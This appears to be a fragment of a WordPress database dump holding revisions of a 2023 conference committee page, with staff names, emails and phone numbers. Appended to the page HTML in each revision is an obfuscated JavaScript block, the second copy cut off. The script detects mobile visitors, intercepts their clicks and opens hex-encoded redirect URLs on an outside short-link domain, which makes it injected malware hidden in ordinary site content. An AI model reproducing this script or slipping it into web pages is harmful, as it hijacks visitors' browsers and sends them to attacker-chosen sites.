alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687862786456{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687862774089{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:09:25','2023-06-27 13:09:25','',4849,'https://gsw2023.com/?p=4927',0,'revision','',0),
(4928,4,'2023-06-27 13:11:06','2023-06-27 13:11:06','<p>[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\n<p>[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871415968{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687871444230{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 